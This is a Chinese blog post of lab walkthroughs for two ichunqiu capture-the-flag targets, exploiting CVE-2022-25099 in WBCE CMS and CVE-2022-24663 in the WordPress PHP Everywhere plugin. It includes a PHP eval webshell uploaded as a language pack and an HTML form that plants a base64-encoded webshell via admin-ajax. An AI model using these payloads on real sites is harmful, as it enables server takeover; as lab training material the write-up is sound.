【春秋云境】CVE-2022-25099靶场WP和CVE-2022-24663靶场WP

已于 2022-12-02 02:31:53 修改
阅读量688 收藏
点赞数
分类专栏: 春秋云镜 文章标签: 网络安全 web安全 php
于 2022-12-01 09:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128121245
版权

【春秋云境】CVE-2022-25099靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
2.开启靶场

请添加图片描述

3.登陆后台

  • 访问/admin,账号admin:密码:123456.成功登陆到后台管理员界面

    请添加图片描述

4.找到提示中的路径

  • 提示给出的路径不完整,但是根据所给的提示可以看出应该是一个安装语言包的地方。咱们就根据这个思路去寻找上传语言包的位置。点击左侧的Add-ons,再点击Language,发现上传点

    请添加图片描述

5.尝试文件上传

  • 尝试上传一句话木马,发现被过滤了

    请添加图片描述

6.远程代码执行

  • 那就可以换个思路,考虑在一句话木马里面添加命令,实现远程代码命令执行,从而获得flag

    <?php
    eval($_REQUEST['cmd']);
    system('cat /flag');
?>

    请添加图片描述

成功获得flag

【春秋云境】CVE-2022-24663靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • 远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
2.开启靶场

请添加图片描述

3.登录后台

  • 已知使用wordpress搭建的网站,直接访问/wp-admin,账号密码都为test

    请添加图片描述

4.构造exp

  • 提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上任意位置执行任意 PHP 代码

     <form
      action="http://eci-2ze8ksyuxp0f18m9ri0x.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
      method="post"
    >
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">
[php_everywhere]<?php file_put_contents("/var/www/html/glc.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4="));?>[/php_everywhere]</textarea
      >
      <input type="submit" value="Execute" />
    </form>

    请添加图片描述

5.验证提交的exp

  • 点击execute,返回json数据。显示success

    请添加图片描述

6.执行命令

  • 访问/glc.php?cmd=system(%27cat%20/flag%27);获得flag

    请添加图片描述

成功获得flag

果粒程1122
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
WBCE CMS安全漏洞(CVE-2022-25099)
千寻的博客
12-09 2297
WBCE CMS v1.5.2的` /language/install.php `文件存在漏洞,攻击者可精心构造文件上传造成`RCE`
春秋 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋CVE-2022-25099
一只爱吃橙子的羊
12-01 1246
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
春秋CVE-2023-26469
qq274575499的博客
03-29 1481
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
春秋CVE-2022-25099(文件上传造成RCE)
m0_65712192的博客
04-22 972
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
CVE-2022-25099
龙狼刺的博客
06-25 436
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE。
春秋CVE-2021-44983靶场WPCVE-2021-40282靶场WP
果粒程
12-14 537
春秋CVE-2021-44983靶场WPCVE-2021-40282靶场WP
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-37969 Windows 本地权限提升 PoC
08-23
CVE-2022-37969 是通用日志文件系统驱动 clfs 中的越界写入漏洞,通过该漏洞,可以完成提权。 // // Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.  // ...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入(CVE-2022-33891)格式化文档 Apache Spark 命令注入(CVE-2022-33891)漏洞复现 CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark ...
春秋CVE-2022-25099
qq_22002773的博客
07-05 176
春秋CVE-2022-25099
WP-春秋-Brute4Road靶场通关完全指南
qq_45234543的博客
12-30 2592
春秋-Brute4Road靶场通关指南,完全通关指南手把手教学
WBCE CMS任意文件上传漏洞(CVE-2022-25099)
weixin_68999845的博客
07-21 1063
WBCE CMS 存在安全漏洞,该漏洞源于 /languages/index.php 中的漏洞允许攻击者通过精心设计的 PHP 文件执行任意代码。源码下载url:https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.5.2.zip。上传路径为 /admin/languages/install.php,在post body部分可以看到明显的恶意payload。1.按照源码下载:https://github.com/WBCE/WBCE_CMS。
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2218
CVE-2022-30887漏洞复现
WBCE CMS v1.5.2 RCE(CVE-2022-25099)漏洞复现
qq_70303095的博客
10-20 2084
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE。
春秋CVE-2022-23906靶场WPCVE-2022-23880靶场WP
果粒程
12-03 678
春秋CVE-2022-23906靶场WPCVE-2022-23880靶场WP
春秋CVE-2022-23134靶场WPCVE-2022-22965靶场WP
果粒程
12-05 1008
春秋CVE-2022-23134靶场WPCVE-2022-22965靶场WP
春秋CVE-2022-22733靶场WP
果粒程
12-07 1469
春秋CVE-2022-22733靶场WP
春秋CVE-2022-29464
09-05
春秋CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值